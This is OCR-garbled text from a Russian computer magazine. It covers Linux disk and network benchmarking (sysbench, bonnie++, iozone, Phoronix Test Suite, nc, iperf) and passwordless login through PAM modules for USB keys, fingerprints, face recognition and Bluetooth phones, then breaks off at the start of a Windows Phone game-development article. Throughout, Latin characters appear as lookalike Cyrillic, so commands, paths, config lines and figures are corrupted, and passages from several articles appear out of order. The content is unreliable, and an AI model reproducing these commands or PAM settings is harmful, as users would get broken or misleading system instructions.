бІе-Ыаі-зіге' нужна, чтобы нивелировать влияние кеша ОС, еезначе- 
ние должно быть больше объема ОЗУ. Теперь запустим тест: 

$ зузЬепсб --61е-1:о1:а1-5І2е=10С --іезІіИіІеіо \ 
--61е-1:е5І:-тосІе=5едгсІ пип 

Самым интересным в выводе будетскорость передачи данных. 
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Тестовый пакет $у$ЬепсИ: последовательное чтение данных 



Приберем за собой (удал им тестовые файлы): 

$ БувЬепсІі --■Ьез'ЬНіІеіо --61е-1:о1:а1-5І2е=10Оі \ 
--■Іі1е-1:е5І:-тосІе=5едгсІ сіеапир 

Для винта в ноутеу меня получилисьследующиезначения: 

* бѳягсі -42.675МЬ/бѳс, 2731 ІОР5 

* Беяыг -47.377МЬ/5ес, 3032 ІОР5 

* гпсігсі - 1.3463МЬ/бѳс, 87 ІОР5 

* гпсЫг - 1.5153 МЬ/бѳс, 97 ІОР5 

Для 550: 



* БѲЯГСІ - 263.1МЬ/5ѲС, 16838 ІОР5 

* бѳяіл/г - 121.95МЬ/бѳс, 7804 ІОР5 

* гпсігсі - 390.63МЬ/бѳс, 25000 І0Р5 

* гпсЫг - 70.559 МЬ/бѳс, 4515 ІОРб 

Следующий по возможностям бенчмарк — Ьоппіе++. Он тестируеттри 
вещи: скорость чтения и записи (посимвольно и поблочно), количество 
запросов в секунду и количество операций с метаданными файла в 
секунду. Полезным дополнением служитфиксирование использования 
СРІІ (в процентах) во время тестов. Вывод Ьоппіе++ представляет из 
себя ріаіп-іехі с 80 колонками, о который можно запросто сломать глаза. 
Поэтому результат лучше сразу конвертить в Ьіті: 

$ Ьоппіе++ -п 1024 | *аі1 -1 | Ьоп_СБѵ2Іі1:т1 \ 

> Ьоп_ге5и11:.ІтІ:т1 

Опция ’-п' указывает на количество файлов, которые будут созданы 
при тестировании операций с метаданными (указанное в опции число 
умножается на 1024). Увеличение этого числа относительно дефолт- 
ного значения нужно в том случае, если операции по записи/чтению 
метаданных проходят слишком быстро, и бенчмаркнеуспеваетза- 
фиксировать время (втаком случае в поле времени этого теста будет 
«+++++»). 

На 550 скорость поблочной последовательной записи (129 МЬ/зес) и 
чтения (31 5 МЬ/зес) оказалась несколько больше, чем в зузЬепсЬ. Пустые 
файлы мо гут создаваться со скоростью 48348 операций в секунду, а 
удаляться — со скоростью 6464 операций в секунду. Метаданные могут 
читаться со скоростью 1 090971 попугаев в секунду. 

И, наконец, наверное, самая фичастая утилита — іогопе. Запусктеста с 
выводом результатов в файл: 




медленных дисках этоттест работает очень дол го. После завершения 
теста І 020 пе.х 1 з будет представлять из себя группу матриц (по одной для 
каждого теста), где строка — размер файла, а столбец — размер фрагмен- 
та чтения/записи. 

Потом тот файл можно будет открыть в ЫЬгеОТісе и построить по нему 
графики. Но руками что-то делать не хочется, особенно, когда надо всего 
на один раз глянуть. Поэтому с іогопе идет скрипт, который позволяет 
построить графике помощью дпирЫ. 

Швейцарский нож 

Обычно бенчмарки позволяют протестировать какую- ни будь одну подси- 
стему компа. Но встречаются и универсалы, самый многообещающий из 
которых — РЬогопіх Тез! ЗиЛе (далее для краткости — РТ5). Сразу ставим 
ему плюс за кроссплатформенность и лицензию ОРІ_ѵЗ. Установить его 
просто — часто встречается в репозиториях популярных дистрибутивов, 
например, в ІІЬипІи: 

# ар1:-§е1: іпзііаіі рЬогопіх-1:е5І:-5иі1:е 

Притянетза собой несколько зависимостей в виде интерпретатора РНР 
и пары библиотек. Как вариант, можно скачать с офсайта ( рЬс 
зиііе.сот ) беЬ-пакет или архив с исходниками. Есть также Ыѵе-версия, 
но сильно устаревшая, к релизу 3.4 (ориентировочно в сентябре) 
обещаютобновление. Один из приятных плюсов Ыѵе-версии — то, что 
большая часть доступных тестов уже скачана, можно свободно обойтись 
без подключения к инету. 

До версии 3.0 был 61)1, но его убрали, так как был написан на РНР- 
ОТК2, который скорее мертв, чем жив. Думаю, сильно расстраиваться 
из-за отсутствия ОШ не стоит — в СЫ-интерфейсе всего пара команд, 
в которых сложно потеряться. В крайнем случае, есть интерактивная 
оболочка: 

$ рІіогопіх-ІіеБІі-Биіѣе іпѣегасЬіѵе 

Список всех доступных тестов: 

$ рІіогопіх-1:е5І:-5иі1:е 1із1:-аѵаі1аЫе-1:е5І;5 

При первом запуске можетзадать несколько вопросов: согласиться 
с лицензией и разрешить анонимную отправку конфигурации ПО/ 
железа и способов использования. Списоктестов стягивается с сайта 
орепЬепсбтагкіпд.огд . поэтому нужен рабочий инети включенные 
опции аІІоѵѵ_иг1_!ореп, ІіІе_ирІоасІ5, аІІоѵѵ_игІ_іпсІисІе в РНР. 

Все тесты разделены на категории в зависимости отподсистемы, которую 
нагружают. Полный список включает в себя: Зузіет, Ргосеззог, Метогу, 
Оізк, ОгарЫсз, ІЧеІѵѵогк — протестировать можно совершенно все. 
Правда, в ІЧеІѵѵогк всего один тест: І_оорЬаскТСРІМеІ\л/огк Ре Но гт а псе. 

В РТ83.2.1 на моментнаписания статьи было доступно 1 18тестов и 46 
тестовых наборов. 

Допустим, мы остановились на каком -то тесте. Прежде чем его запускать, 
разумно просмотреть информацию о нем: 

$ рІіогопіх-1:е5І:-5иі1:е іпТо сотрге55-72Ір 

По крайней мере, это даст количество трафика, которое потребуется, 
чтобы прогнать этоттест (ибо некоторые тесты качают помногу, а чтобы 
загрузить все тесты, потребуется более 10 Гб). Кстати, все скачанные 
тесты с помощью команды 

$ рІіогопіх-1:е5І:-5иі1:е таке-сіоыпіоасі-сасііе 




$ І020ПѲ -Ка -§ 10С > І020ПѲ.ХІ5 

Где '-а' — запуск всехтестов, '-Р' — генерировать совместимый с Ехсеі 
вывод, ’-д' указывает максимальный размер файла для тестирования 
(он должен быть больше размера ОЗУ). Тут надо быть готовым, что на 



можно перенести в каталог —/.рГіогопіх-ІезІ-зиіІе/сІ оѵѵпІоасІ-сасГіе/, 
который потом можно разбросать по другим компам. 

Запусктеста скорости архивации с помощью 7-гі р: 

$ рІіогопіх-1:е5І:-5иі1:е Ьепсбтагк сотрге55-7іір 
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После запуска РТЗ потащите офсайта исходники определенной версии 
7-2Ір и при необходимости соберет их. РТ8 старается не использовать 
пакеты из репозиториев, чтобы максимально абстрагироваться от дис- 
трибутивов, где могут присутствовать какие-то патчи или другие версии. 
Единственное — библиотеки для сборки и компиляторы устанавливают- 
ся с помощью стандартного менеджера пакетов. 

Ксожалению, штатными средствами РТ5 нельзя запустить несколько те- 
стов последовательно. Частично обойти это ограничение можно, исполь- 
зуя наборы тестов. Список доступных наборов можно посмотреть так: 

$ рІіогопіх-іеБі-Биііе ІІБі-аѵаіІаЫе-БиііеБ 

Кпримеру, списоктестов в наборе сотрііаііоп: 

* різ/ЬиіІсІ-арасІіе 

* рів/ЬиіІсІ-рІір 

* рів/ЬиіІсІ-трІауег 

* рів/ЬиіІсІ-Ііпих-кегпеІ 

* рі5/Ьиі1сІ-іта§ета§іск 

Кроме обычных тестовых наборов с фиксированным набором тестов есть 
еще виртуальные наборы, количествотестов в которыхзависитот каких- 
либоусловий. 

$ рбогопіх-іезі-БиіІіе ІІБі-аѵаіІаЫе-ѵігіиаІ-БиііеБ 



$ рІіогопіх-іеБі-Биііе орепЬепсІітагкіп§-1о§іп 

Еще один плюс РТЗ — простота создания и изменениятестовых профилей 
и наборов. Все доступные тесты скачаются с сайта орепЬепсбтагкіпд.огд 
в каталог пользователя : -/.рбогопіх-ІезІ-зиіІеАеБІ-ргобІеБ/рІз, где можно 
точно посмотреть, ка кой тест что делает и, в случае чего, поправить. 
Например, у меня тест Ьиі Ш- рбр отказывался ставиться потому, что он 
пытался стянуть с зеркал рбр версии 5.2.9, который уже не поддерживает- 
ся, и на зеркалах его нет. Для исправления этой ошибки достаточно было 
в файле сІоѵѵпІоасІБ.хппІ исправить пути на более новую версию и чуть-чуть 
поменять версии в скриптах рге- и розбпБІаІІ.Бб. 

Сеть 

Какобычнотестируютсеть? В случае с инетом, пожалуй, самый популяр- 
ный способ — БреесЙезІ.пеІ или іпІегпеТуапсІех.ги . Еще один довольно 
действенный способ — какой-нибудь популярныйторрент(например, 
последний релиз ІІЬипІи). То есть, с инетом все более-менее понятно. Но 
как быть в случае Л ВС? Самый топорный способ — просто создать файл 
побольше и кидать его по сети через пс. 

На сервере запускаем пс, слушающий порт 1 234: 

$ пс -с\ 0 -1 1234 > /1:тр/Ьі§_Рі1е 

На клиенте отправляем на сервер какой-нибудь большой файл, замеряя 
время: 



На мой взгляд, самые полезные из них: 

* аіі - все тесты; 

* іпзіаііесі - все установленные тесты; 

* Бузует | ргосеББОГ |§гарІііс5 - все тесты для тестирования 

определенной подсистемы. 

Одно из основных достоинств РТЗ — симпатичные НТМІ_-отчеты, кото- 
рые предлагается просмотреть в браузере после прохождения каждого 
теста. Ихтакжеоченьудобно мержить командой тегде-гезиНБ. Ну а 
сп и со к доступных тесто в можно посмотреть командой БЬоѵѵ-гезиІС 
Собственно, РТЗ не представляет из себя чего-то сверхъестественного — 
просто довольно удобная оболочка для запуска стороннихутилит. Но все 
меняется, когда приходит орепЬепсбтагкіпд.огс — сайт, с которым РТЗ 
тесно интегрирован. С этого сайта тянутся тесты, и на него (при желании) 
загружаются результаты тестов. За довольно короткое время с момента 
запуска там накопилось более 300 тысяч тестов. Теперь можно легко 
сравнить производительность разных аппаратных компонентов в І_іпих 
и других ОС. Или найти тесты своей железки, чтобы понять, должный 
лиу нее уровень производительности, или надо искать баг. Еще можно 
сделать свои тесты или наборы, загрузить их на орепЬепсбтагкіпд.огд . 
и потом они будутавтоматически синхронизироваться на всех компах 
с РТЗ, как, впрочем, и результаты тестов. Попросить РТЗ использовать 
учеткуна орепЬепсбтагкіпд.огд можно следующим образом: 



$ ііте саі /ітр/Ьі§^й1е | пс -дѲ 5егѵег_ІР 1234 

Есть более точные инструменты, самый удобный из которых, на мой 
взгляд, — ірегТ. 

Ставим: 

# арі-§е1: іпБіаІІ ірегТ 

На одном из компов в сети выполняем: 

$ ірегТ -б 

Откроется портТСР/5001 . На другом компе выполняем: 

$ ірегТ -с зегѵеМіоБІ: 

В выводе сервера в колонке ВапсІѵѵісШп отобразится пропускная способ- 
ность сервера. 

Десять секунд — маловато, поэтому рекомендую с помощью опции кли- 
ента '-С установить хотя бы шестьдесят. 

По умолчанию ірегТтестируетТСР-протокол. Можно попросить его тести- 
ровать ІЮР.добавивопцию '-и' к серверу и клиенту. Тестирование ШР 
полезнотем, что отображается количество потерянных пакетов, почему 
можно судить о качестве соединения, т 
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ПОСТОРОННИМ 
ВХОД ВОСПРЕЩЕН 

Используем современные методы входа в систему 

• Тебе никогда не приходила в голову мысль о том, что идея 
использовать логин и пароль для входа в систему несколько устарела? 
Почему, имея в одном кармане флешку, в другом - телефон, а на 
компе установленный 55Н с настроенной авторизацией при помощи 
ключей, мы продолжаем вводить эти запутанные пароли? 



Пароли и учетные записи были придуманы в эпоху больших мейн- 
фреймов, движения хиппи, войны в Афганистане и больших анало- 
говых магнитофонов, самымтехнологичным компонентом из которых 
были транзисторы. В те времена использование паролей для входа 
в мейнфрейм выглядело действительно круто. Можно было приду- 
мать комбинацию вроде зехбего или іаплзирегтап и действительно 
гордиться собой. 

Сегодня же пароли выглядят нетолько архаичной, но и ужасно 
неудобной вещью, старые понтовые комбинации уже не работают, и 
вместо них приходится придумывать зубодробительные наборы сим- 



волов, которые нетолько нереально запомнить, но и проблематично 
ввести с первого раза. Мыживем вХХІ веке, имеем доступ когромно- 
му количеству гаджетов и технических средств, которые предлагают 
гораздо более простой и качественный механизм аутентификации, но 
продолжаем вбивать пароли, матерясь на всю квартиру при каждой 
неудачной попытке войти в систему. Пора это исправить. 

В этой статье я расскажу о том, как раз и навсегда избавиться от паро- 
лей и превратить свой комп в по-настоящемутехнологичное устрой- 
ство, для входа в которое будет достаточно вставить флешку, взглянуть 
в веб-камеру или просто положить на стол сотовый телефон. 
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Добавляем модули рат_и$Ь и рат_1ргіпі в стек РАМ 



Высокотехнологичный ключ 

Ключ — самый простой и эффективный методзащиты чего 
бы то ни было. Мы пользуемся ключами ежедневно: для 
включения двигателя автомобиля, для входа в квартиру, 
для отпирания ящиков и шкафов. Ключи удобны и просты 
в изготовлении, благодаря современным программи- 
руемым замкам их не страшно потерять. Множество раз 
человечество пыталось придуматьзамену ключам, но все 
попытки провалились (все мы помним, кчемупривела 
идея использовать кодовые замки на подъездных две- 
рях). Почему же мы не используем столь хорошую и прове- 
ренную временем технологию для защиты компьютеров? 
Современный аналог ключа — ІІЗВ-флешка. Вне за- 
висимости оттого, для каких целей ты обычно использу- 
ешь флешку, из нее всегда можно сделать полноценный 
высокотехнологичный ключ, с помощью которого войти в 
систему будеттакже легко, какотпереть дверь в квартиру. 
Есть несколько способов сделать это, но наиболее 
простой и универсальный метод — это использовать 
РАМ-модуль рат_изЬ ( ратизЬ.ота ). который будет про- 
верять каждую вставленную в комп флешку на предметее 
соответствия указанным требованиям и, в зависимости 
от результата, разблокировать или блокировать учетную 
запись пользователя. 

Никакой модификации таблицы разделов или информа- 
ции, хранимой на флешке, при этом не потребуется. Для 
идентификации «правильной» флешки используется ее 
серийный номер, модель, производитель, атакже набор 
случайных данных, которые записываются в резервную 
область флешки и изменяются при каждой удачной 
аутентификации (если кто-то скопируеттвою флешку, но 
тыуспеешь войти в систему раньше злоумышленника, 
данные будут изменены, и его копия уже не сработает). 

В случае утери всегда останется возможность войти в 
систему, используя пароль, и перекодировать рат_изЬ на 
новую флешку. Также в качестве ключа можно использо- 
вать различные карты памяти (50, ММС) и другие съем- 
ные накопители. Начать использовать рат_изб довольно 
просто. Полная настройка системы состоит из пяти шагов. 

1. Ставим библиотеку ІіЬрат_изЬ.зо и утилиты управле- 
ния модулем: 

$ зисіо арТ-^еТ іпзТаІІ НЬрат-изЬ ратизЬ-ІіооІз 

2 . Берем флешку, которую собираемся использовать в 
качестве ключа, вставляем ее в ІІБВ-порт и выполняем 
следующую команду: 

$ біісіо ратизЬ-соітР — асісі - сіеѵісе имя 



Так рат_изЬ соберет всю необходимую информацию о 
флешке, добавит в свою базу данных и запишет 2 Кб случай- 
ныхданных. Для поиска флешки в системе будетисполь- 
зован Шізкз(аргумент«имя»здесь используется, чтобы 
датьфлешке произвольное название, а недляуказания ее 
файла-устройства), та к что важно, чтобы другие внешние 
накопители на время работы этой команды были отключены. 

3. Теперь даем рат_изЬ понять, чтобы эта флешка была 
ассоциирована с нужной нам учетной записью (путь это 
будет ѵазуа): 

$ зисіо ратизЬ-согѵР --асісі-изег ѵазуа 

4 . Запускаем проверку правильности собранных данных 
на случай, если флешка не была корректно идентифи- 
цирована. Или мы забыли отсоединить какой-то другой 
накопитель, и он был использован вместо нужного нам: 

$ зисіо ратизЬ-сІіеск ѵазуа 

5 . Добавляем рат_изЬ в список модулей, необходимых 
для проведения успешной аутентификации пользова- 
теля. В ІІЬипІи и других дистрибутивах, основанных на 
ОеЬіап, это делается с помощью модификации файла/ 
еіс/рапп.сі/сопптоп-аиіб. В нем необходимо найти строку 
примерно следующего вида (она может отличаться): 

ХаиТІі гедиігесі рат_ипіх.зо 
И прямо перед ней добавить следующую строку: 

аиТб зи-РІісіепІ: рат_изЬ.зо 

Такмы сообщим РАМ, что передлогином любого пользова- 
теля нужно отдавать управление модулю рат_іі5Ь, который 
проверит наличие нужной флешки, и лишь в случае неуда- 
чи этой операции запрашивать пароль. Поэтому, если ты 
хочешь впускать пользователя только по флешке, полно- 
стью блокируя аккаунт в случае неудачи, слово «зиДісіепІ» 
следует заменить словом «гециігесі». В принципе, всего 
этого должно быть достаточно для того, чтобы система про- 
сто работала (попытайся выйти и войти, чтобы это прове- 
рить), однако функциональность рапл_изЬ можно несколько 
расширить, если использовать демон раппизЬ-адепТ 
Задача ратизб-адепі — автоматизировать работу по 
блокированию и разблокированиюучетной записи поль- 
зователя при извлечении и втыкании флешки в комп. 
Чтобы агентзаработал, необходимо добавить в конфигу- 
рационный файл /еІс/ратизЬ. сонаследующие строки: 




• Аналог файла /еХс/ 
рат.сІ/соттоп-аиіЬ 
в Ѳепіоо и Мапбгіѵа 
носит имя /еіс/ 

ра т . сі/зузіе т - а и іЬ , 
во ЕгееВЗБ вместо 
него используется / 
еію/рат.сі/зузіюпп. В 
АгсЬЫпих придется 
править РАМ-конфиги 
отдельно для каждого 
приложения. 

• Еще один способ 
обезопасить машину 
от вторжения — уда- 
ленно создать файл / 
еіс/поіодіп с помо- 
щью любого мобиль- 
ного 55Н-клиента. 

Для разблокировки 
придется войти как 
гооІ и удалить этот 
файл. 
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Настраиваем аутентификацию 
с помощью У5В-РІа$Іі 




сразу после добавления ІБВ-флешки 



<ивег ісІ= ,, имя_юзера ,, > 
ксіеѵісе >имя_у строй ства</сІеѵісе> 

<а§еп1: еѵеп1:= ,, 1оск ,, > 

§поте-зсгееп5аѵег-соттапсІ - -1оск</а§еп1:> 

<а§еп1: еѵеп1:= ,, ип1оск ,, > 

§поте-зсгееп5аѵег-соттапсІ - -сІеас1;іѵа1:е</а§еп1:> 

</изег> 

Это рецепт для Опоппе. Чтобы использовать ратизЬ-адепІ с другими 
средами, команды «дпоте-Бсгеепзаѵег-соппппапсІ --Іоск» и «дпоте- 
Бсгеепзаѵег-соттапсІ --беасбѵаіе» необходимо изменить. 

Теперь можно запустить ратизЬ-адепІ и проверить его работоспо- 
собность: 

$ ративЬ-а§еп1: 

Если все работает нормально, можно добавить его в автозапуск: 

$ ссі ~/ . соп1і§/аи1:о5І:ап1: 

$ 1п -5 /изг/Ып/ративЬ-а^епІ: ративЬ-а^епІ: 

Обкатаем пальчики? 

Модуль рат_и5б удобно использовать в качестве метода защиты 
ноутбуков, оснащенных кард-ридером. Можно носить небольшую 
ЭЭ-карту в кошельке или внутреннем кармане и втыкать ее в ноутбук, не 
беспокоясь отом, что она будет мешать (какэто происходит в случае с 
ІІЭВ-флешкой). Однако этот подход будет вы глядеть несколько архаич- 
но, если ноутбукуже оснащен сканером для снятия отпечатков пальцев. 
Ноутбуки со сканером отпечатков пальцев выпускают многие про- 
изводители. Как правило, они не намного дороже других сходных по 
характеристикам моделей, однако их сенсор отпечатков работает 
только в ѴѴіпбоѵѵз. Для устранения этого недостатка ігеесІеБкіор.огд 
запустил проект іргіпі ( ѵѵѵѵѵѵігеесІеБкІор.огд/ѵѵікі/ЗоІІѵѵагеЛргіпІ: ). в 
рамках которого разработана открытая реализация библиотеки для 
распознавания отпечатков и соответствующий РАМ-модуль, по- 
зволяющий задействовать возможности библиотеки во время логина 
пользователя и других манипуляций над аккаунтом. 

Сегодня ІіЬіргіпІ есть в любом дистрибутиве, поэтому установить его 
можно с помощью любого пакетного менеджера: 

$ біісіо ар1:-§е1: іп5І:а11 ІіЬТргіпТѲ \ 

1іЬрат--рргіп1: -рргіп1:-сІето 

Далее сканер можно проверить с помощью специальной демонстра- 
ционной программы с графическим интерфейсом: 



$ -рргіп1:_сІето 

Если все работает корректно и без сбоев, можно начать на- 
стройку аутентификации. Для этого следует запустить программу 
рат^ргіп^епгоіі, которая позволит сделать эталонный слепок 
отпечатка пальца, который затем будет использован для иденти- 
фикации его владельца: 

# рат_-рргіп1:_епго11 -епго11-1іп§еп 7 

Цифра 7 здесьозначаетуказательный палец правой руки. Система 
Іргіпі нумерует пальцы слева направо, так что цифрой 1 будетобо- 
значен мизинец левой руки, а 1 0 — мизинец правой. 

Когда слепок будет готов, добавим модуль рагтНргіпІ в стекРАМ- 
модулей всех приложений, для этого открываем файл /еіс/рат.б/ 
соттоп-аибп, находим всетуже строку «аиіЬ гедиігеб рат_ипіх.50» и 
добавляем прямо перед ней строку, отвечающую за загрузку ратДрппС 

аігЫі 5и-Р1ісіеп1: рат_-рргіп1: . зо 

При следующем логине все должно заработать. 

Память на лица 

Пальцы — не единственное, что отличаетлюдей друг от друга. У всех 
нас разные лица, поэтому для идентификации пользователя система 
может использовать снимок лица, сделанный веб- камерой. Это не 
особо секьюрно, так как атакующий может показать камере обычную 
фотографию, отпечатанную на бумаге, но произведеточень сильное 
впечатление на друзей и знакомых. 

В Ыпих-дистрибутивах нет встроенных средств распознавания лиц, 
однако их можно добавитьс помощью установки комплекта ПО под 
названием рат-ІБсе-аіЛЬепІісаІіоп [ ѵѵѵѵѵѵ.рат-і'асе-аиібепіісаііоп. 
огд ). который включает в себя библиотеку, реализующую алгоритм 
распознавания лиц, РАМ-модуль для осуществления аутентифика- 
ции и приложение для генерирования эталонного снимка. 

Все это можно собрать из исходников или же уста но вить из сторонних 
репозиториев в ІІЬипІи. Так как проектеще сырой, и пакеты под- 
готовлены не для всех дистрибутивов, мы рассмотрим оба варианта 
установки. Итак, для установки из исходников нам понадобятся 
пакеты с компилятором, линковщиком и заголовочными файлами 
для всехзависимостей. В ІІЬипІи (да и в других дистрибах) их можно 
установить, выполнив одну команду: 

$ біісіо ар1:-§е1: іп5І:а11 Ьиі1сІ-е55еп1:іа1 стаке \ 
д1:4-дтаке ІіЬхІІ-сІеѵ ІіЬсѵ-сІеѵ ІіЬсѵаих-сІеѵ \ 

1іЫіі§Іі§иі4 1іЫіі§Іі§иі-сІеѵ 1іЬд1:4-сІеѵ \ 

1іЬратѲ§-сІеѵ 
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Далее скачиваем исходники со страницы проекта и распаковываем: 

$ ССІ 

$ м§е1: Іі1:1:р://§оо.§1/сІрОІ5 

$ г -Х 2 -Р рат--Расе-аи1:Ііеп1;іса1:іоп-Ѳ. 3.1:аг.§2 

Для сборки используется сппаке, поэтому здесь все просто: 

$ ссІ рат--Расе-аи1:Ііеп1:іса1:іоп-Ѳ. 3 
$ стаке && таке 
$ зисіо таке Іпз1:а11 

Для установки уже прекомпилированного пакета в ІІЬипІи можно ис- 
пользовать репозиторий апІопіо.сЫигаггі: 

$ зисіо асісі-аріі-герозіііогу рра:ап 1 :опіо.сІііипа 22 І/рра 
$ зисіо ар1:-§е1: ирсІа1:е 

$ зисіо ар1:-§е1; Іпз1:а11 рат--Расе-аи1:Ііеп1:іса1:іоп 

После окончания установки запускаем обучающую программу: 

$ д-^-Расе^гап-пег 

Вертим лицом перед камерой, постоянно нажимая кнопку «Саріиге». 
Важно сделать хотя бы десяток фотографий, чтобы система научи- 
лась распознавать твое лицо под любым углом. Также будет неплохо 
сделать фотографии при разной освещенности. Не забываем про- 
тестировать работу системы. 

Теперь добавим модуль рат_1 : асе_аи1:бепбса1:юп.50 в стекзагружае- 
мых РАМ-модулей. Для этого открываем файл /еіс/рапп.сі/дбпп или/ 
еіс/рат.сі/кбпп (если ты пользуешься КОЕ) и добавляем в его начало 
следующую строку: 

аиТб зи-РбсіепІ: рат_Тасе_аи1:Ііеп1:іса1:іоп . зо епаЫеХ 

Файл /еіс/рат.б/соттоп-аиіб изменятьне надо, так какой исполь- 
зуется нетолько графическими менеджерами входа в систему, но и 
стандартными консольными /Ьіп/Іодіп и/Ьіп/зи, а рат^а се требует 
доступа к иксам. 

Также необходимо создать профиль для нового РАМ-модуля. От- 
крываем (создаем) файл /изг/зЬаге/рат-сопбдзЛасе-аиіИепбсабоп 
следующего содержания: 

Мате: Мапиаііу Іпз1:а11ес1 Тасе_аи1:Ііеп1:іса1:іоп ргобіе 

йеТаиН:: уез 

Ргіогі1:у: 900 

АиТб-Туре: Ргітагу 

Аи-Ып: 

[зиссезз=епсІ сІеТаи11:=і§поге] 
рат_Тасе_аи1:Ііеп1:іса1:іоп . зо епаЫеХ 

И активируем его: 

$ зисіо рат-аиІФ-ирсІаТе --раскате Тасе_аи1:Ііеп1:іса1:іоп 

Ключ из телефона 

Сотовый телефон — символ 21-го века. Мы давно привыкли ктому, 
что его можно использовать не только для звонков, но и для выхода 
в интернет, игр, прослушивания музыки, просмотра видео и даже 
оплаты счетов. Но можно ли использовать его как ключ для входа в 
компьютерную систему? 

Конечно, да. Как и 115В- флешка, телефон имеет множество при- 
знаков, которые делают его уникальным. Это все те же идентифи- 
каторы производителя и модели, серийный номер, МАС-адреса, 
ІМЕІ, в конце концов. Любой из них можно использовать для 
однозначной идентификации устройства и его владельца, но мы 



остановимся только на одном из них — МАС-адресе Віиеіооіб- 
интерфейса. 

Любой, даже очень древний и простой телефон имеет поддерж- 
ку протокола Віиеіооіб и, как следствие, уникальный МАС- 
адрес, который передает в сеть в ответ на любой запрос поиска 
устройств другим Віиеіооіб-адаптером. Многие современные 
ноутбуки имеют на борту такой адаптер, а его внешний ІІЗВ’шный 
вариант стоит копейки, так что для нас синий зуб будет идеаль- 
ным вариантом для настройки беспарольной и беспроводной 
аутентификации. Зашел в комнату — доступ открыт, вышел — 
система заблокирована. 

Берем телефон, включаем ВІиеІооіЬ, делаем так, чтобы он был 
«видим» другим устройствам. Садимся за комп и запускаем утилиту 
Ьсііооі (входит в пакет Ыиег-иіііз) в режиме поиска устройств: 

$ іісіііооі зсап 

Получаем имя своего устройства и его МАС-адрес, копируем по- 
следний в буфер обмена. Устанавливаем пакет ІіЬрат_Ыие (или 
рат_Ыие, где как): 

$ зисіо ар1:-§е1: Іпз1:а11 1іЬрат_Ыие 

Создаем файл конфигурации /еІс/зесигіІу/Ыиеззсап.сопІ 1 и пишем в 
него следующее: 

# Общие настройки 
§епега1 { 

# Продолжительность сканирования в секундах (от 3 до 15) 
ѣітеоиі: = 15; 

} 

# Настройки пользователей и их устройств 
ту1о§іп = { 

пате = Имя устройства; 

Ыиетас = МАС-адрес устройства; 

} 

Сохраняем файл, открываем уже знакомый нам конфиг/еіс/рапл.б/ 
соттоп-аиіб и добавляем строку: 

аиІФ зи-РбсіепІ: рат_Ыие.зо 

перед строкой, содержащей «рат_ипіх.зо». 

Теперь для входа в систему будет достаточно положить телефон ря- 
дом с ноутом и ввести имя. Далее управление будет передано модулю 
рат_Ыие, который просканируетсеть, найдет МАС-адрестелефона и 
впустит пользователя. В противном случае придется ввести пароль. 

Выводы 

Настроить беспарольную аутентификацию с помощью альтерна- 
тивных методов в Ыпих довольно просто. Для этого не нужно быть 
матерым гиком, уметь писать код или иметь глубокие познания в 
области безопасности, все делается за несколько минут и работает 
поразительно эффективно. Ты можешь сказать, что большинство 
из этих методов потенциально небезопасны и легко обходятся, но 
перед тем как это сделать, задумайся о том, насколько безопасны 
обычные пароли. 

Безопасность машины, к которой могут получить доступ сторонние 
люди — чистой воды миф. Обойти стандартную защиту паролем про- 
ще простого. Есть огромное количество способов сделать это, и все 
они известны даже детям. Пароль — это лишь небольшой указатель- 
ный знак, несущий информацию отом, чтоу компа есть владелец, и 
он не хочет видеть непрошенных гостей. Применив методы, опи- 
санные в статье, мы не сделаем систему более уязвимой, но сможем 
сделать своюжизнь проще и удобнее, т 
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Начинаем кодить игры под новую ось, 
конкуренты не дремлют! 

ѳВ июле вышла обновленная операционная система от МісгозоН 
для смартфонов - ѴѴіпсІоѵѵз РНопе 7.1 под кодовым именем Мапдо. 
Этот апдейт (помимо исправления традиционных майкрософтовских 
багов) открыл перед отечественными разработчиками широкие 
возможности, которыми западные девелоперы пользовались с 
релиза первой версии системы. 



Развлекаться с помощью смартфона можно по-разному: посмо- 
треть свежий блокбастер, послушать музыку или же поиграть. 
Раньше автор пренебрегал возможностью поиграть на мобиль- 
ном устройстве, считая, что на нем нельзя получить фан от игры. 
Однако прошло время, и стали появляться миниатюрные девай- 
сы с достаточной для многих игр конфигурацией. Тем не менее, 
эти устройства оставляли меня равнодушным. После выхода в 
конце прошлого года операционной системы ѴѴіпсІоѵѵз Рбопе 7.0 
ситуация изменилась. Теперь стало возможным программировать 
мобильные игры, используя «родной» инструментарий и нако- 
пленный за время программирования под винду опыт. Однако, 
в прошлой версии ОС не было поддержки великого и могучего, 
и телефоны с ней не были предназначены для продажи у нас в 
стране. Было грустно еще и потому, что российские разработчики 



не могли напрямую получать деньги за продаваемые в магазине 
ѴѴіпсІоѵѵз Рбопе Магкеіріасе-приложения. Все это обещали испра- 
вить в следующем апдейте. 

На проходившей в конце мая в Москве конференции ОеѵСоп’1 1 
МісгозоЙ объявила, что апдейт ѴѴіпсІоѵѵз Рбопе 7.1 (Мапдо) выйдетв 
июле и будет содержать все обещанное ранее. Заглядывая в будущее 
(а ведьты читаешь этот номер уже в будущем :], можно сделать вывод, 
что сейчас — самое время начать разрабатывать приложения для 
этой платформы. Поскольку ѴѴР — молодая система (ей нет еще и 
года), то и прикладные программы для нее нужны разного характера. 
Тем не менее, обращая твое внимание на первый абзац, добав- 
лю неоспоримый факт: приложения, пользующиеся наибольшим 
спросом на мобильныхустройствах — это игры. Их разработкой я и 
предлагаю заняться. 
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Рис. 2. Эмулятор телефона 



Рис. 1. Новые шаблоны проектов 

ѴѴіпсІоѵѵз Рбопе 7.1 Мапдо 

Какуже было сказано ранее, чтобы разрабатывать 
приложения для ѴѴР, надо использоватьте же тулзы, 
что и в процессе разработки десктопных ѴѴіпсІоѵѵз- 
программ. Можно посчитать это за счастье, так как для 
разработки приложений под предыдущую мобильную 
ОС от МісгозоІІ — ѴѴіпсіоѵѵб МоЬіІе 6.5, необходимо было 
использовать еМЬесИесІ Ѵізиаііооіз, который предлагал 
два ген но модифицированных языка — еМЬесИесІ Ѵізиаі 
Вазіс и еМЬесИесІ Ѵізиаі С++. 

Таким образом, тебе понадобятся Ѵізиаі 5іиб іо 2010, 

.ЫЕТ Ргате\л/огк4.0 (именно эти версии, или новее, если 
хочешь программировать для ѴѴР 7.1 ) и, собственно, 
комплект разработчика ѴѴіпсІоѵѵз РЬопе ОеѵеІорегТооІз 
— имеется бета для ОС ѴѴР 7.1 , которую свободно можно 
скачать с сайта МісгозоІІ). Впрочем, пакет самодостато- 
чен, он включает: бесплатную Ѵізиаі 5іи б іо 2010 Ехргезз, 
возможностей которой вполне хватит для разработки под 
